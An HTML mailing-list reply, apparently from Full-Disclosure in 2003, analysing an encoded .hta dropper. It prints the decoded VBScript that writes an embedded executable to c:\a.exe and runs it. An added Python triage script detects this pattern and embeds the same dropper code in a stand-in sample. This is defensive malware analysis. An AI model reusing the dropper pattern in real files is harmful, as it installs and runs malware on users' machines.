<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<META content="MSHTML 6.00.2800.1276" name=GENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=#ffffff>
<DIV>.hta files are a proprietary concept and only work in conjunction with
Internet Explorer (specifically version 5 and above). Basically, an .hta is much like an
.html except it has no security restrictions.</DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV>There are 2 things being encoded in the script you send:<BR><BR>an
executable in a string called m<BR>and a piece of VBScript code in a string
called c<BR><BR>They seem to be encoded to trick virus scanners into letting them
pass.<BR><BR>Decoding the VBScript code we get:<BR><BR>&lt;script
language="VBScript"&gt;<BR>' fs: file system object, dr: text stream for the dropped file, f: drop path<BR>Dim fs, dr, f<BR>Set fs =
CreateObject("Scripting.FileSystemObject")<BR>f = "c:\a.exe"<BR>' write the decoded executable string m to disk<BR>Set dr =
fs.CreateTextFile(f, True)<BR>dr.Writeline m<BR>dr.close<BR>' launch the dropped file, then close the HTA window<BR>Set
shell=CreateObject("WScript.Shell")<BR>shell.run(f)<BR>self.close<BR>&lt;/SCRIPT&gt;
<BR><BR>which basically says: take the embedded .exe file, store it in c:\a.exe, then
execute it.<BR></DIV>
<DIV>The exe being dropped is identified by Norton as Trojan.Sinkin.</DIV>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<BLOCKQUOTE><DIV>Trojan.Sinkin is a Trojan Horse that changes the
Internet Explorer start and search pages, and sends
AOL Instant Messenger information to a remote host.
This Trojan may also display advertisements when the user is browsing the
Web.</DIV></BLOCKQUOTE>
<DIV><FONT face=Arial size=2></FONT> </DIV>
<DIV>now you know</DIV>
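<DIV>Added example (not part of the original post, and not the attachment itself): a static
triage script that does by hand what the analysis above describes, i.e. pulls the VBScript
string assignments (m and c) out of an .hta, decodes them, and checks whether one decodes to
something with an MZ header and the other to a script that creates a file, writes to it and
runs the same file. Nothing in it executes the HTA. The list message does not show which
encoding the real sample used, so hex is assumed (with base64 as a fallback), and the embedded
sample .hta is a constructed stand-in with a stub "executable" that only carries an MZ header.</DIV>

```python
"""Static triage of an HTA dropper of the kind analysed above.

Added example, not code from the original post. Nothing here runs the HTA:
it pulls the VBScript string assignments out of the file, decodes them and
looks for the dropper pattern (decoded bytes start with "MZ"; script creates
a file, writes to it and runs it). The list message does not show the
encoding the real sample used, so hex is assumed, with base64 as a fallback.
"""
import base64
import binascii
import re

# --- constructed sample (stand-in for the attachment; not the real file) ----
# Same shape as described in the analysis: executable in m, dropper in c.
# The "executable" is a stub with an MZ header only, not a valid PE.
_DROPPER_VBS = (
    'Dim fs, dr, f\r\n'
    'Set fs = CreateObject("Scripting.FileSystemObject")\r\n'
    'f = "c:\\a.exe"\r\n'
    'Set dr = fs.CreateTextFile(f, True)\r\n'
    'dr.Writeline m\r\n'
    'dr.close\r\n'
    'Set shell=CreateObject("WScript.Shell")\r\n'
    'shell.run(f)\r\n'
    'self.close\r\n'
)
_FAKE_EXE = b"MZ\x90\x00" + b"\x00" * 28 + b"PE\x00\x00"

SAMPLE_HTA = (
    '<html><head><title>x</title></head><body>\n'
    '<script language="VBScript">\n'
    'Dim m, c\n'
    'm = "' + _FAKE_EXE.hex() + '"\n'
    'c = "' + _DROPPER_VBS.encode().hex() + '"\n'
    "' the decode routine and the Execute of c are left out of this stand-in\n"
    '</script></body></html>\n'
)

# VBScript string assignment, allowing "..." & _ <newline> "..." continuation.
_ASSIGN = re.compile(
    r'^\s*(\w+)\s*=\s*("(?:[^"]|"")*"(?:\s*&\s*_?\s*"(?:[^"]|"")*")*)', re.M)
_LITERAL = re.compile(r'"((?:[^"]|"")*)"')

DROPPER_MARKERS = ("Scripting.FileSystemObject", "CreateTextFile",
                   "WScript.Shell", ".run")


def extract_strings(hta: str) -> dict:
    """Return {variable: string literal}, joining concatenated chunks."""
    out = {}
    for m in _ASSIGN.finditer(hta):
        parts = _LITERAL.findall(m.group(2))
        out[m.group(1)] = "".join(p.replace('""', '"') for p in parts)
    return out


def decode_payload(literal: str) -> bytes:
    """Hex first, then base64; otherwise treat the literal as plain text."""
    try:
        return bytes.fromhex(literal)
    except ValueError:
        pass
    try:
        return base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return literal.encode("latin-1", "replace")


def triage(hta: str) -> dict:
    """Report what the decoded strings would do, without executing anything."""
    report = {"drops_pe": False, "pe_var": None, "script_var": None,
              "markers": [], "drop_path": None, "runs_dropped_file": False}
    for name, literal in extract_strings(hta).items():
        data = decode_payload(literal)
        if data[:2] == b"MZ":                      # DOS/PE header
            report["drops_pe"], report["pe_var"] = True, name
            continue
        text = data.decode("latin-1")
        found = [k for k in DROPPER_MARKERS if k.lower() in text.lower()]
        if not found:
            continue
        report["script_var"], report["markers"] = name, found
        # Follow the variable passed to CreateTextFile: where is it written,
        # and is the same variable handed to WScript.Shell.run?
        target = re.search(r'CreateTextFile\s*\(\s*(\w+)', text, re.I)
        if target:
            var = target.group(1)
            path = re.search(r'\b%s\s*=\s*"([^"]+)"' % re.escape(var), text)
            report["drop_path"] = path.group(1) if path else None
            report["runs_dropped_file"] = bool(
                re.search(r'\.run\s*\(?\s*%s\b' % re.escape(var), text, re.I))
    return report


if __name__ == "__main__":
    for k, v in triage(SAMPLE_HTA).items():
        print(f"{k}: {v}")
```

<DIV>Run it against a real .hta by reading the file into a string and passing it to
triage(); if both the hex and base64 guesses fail, decode_payload() hands back the literal
unchanged, so a sample using a different scheme shows up as "no markers found" rather than
as a false negative, and the encoding has to be worked out by hand.</DIV>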
<DIV><BR>-----
Original Message ----- <BR>From: Jim Duggan <BR>To:
full-disclosure@lists.netsys.com <BR>Sent: Thursday, November 20, 2003 2:31
AM<BR>Subject: [Full-Disclosure] .hta virus analysis<BR><BR><BR><BR>A friend
contracted this .hta that seems to edit your profile with a link to itself,
http://www.talkstocks.net/<BR>Attached is the .hta file it attempts to run.
It looks to be encoded, which is something I don't know much about, but I'm sure
most people on this list will have no problem reading it; just wondering what it
does.<BR><BR>Any help appreciated<BR>Thx<BR><BR>Jason</DIV></BODY></HTML>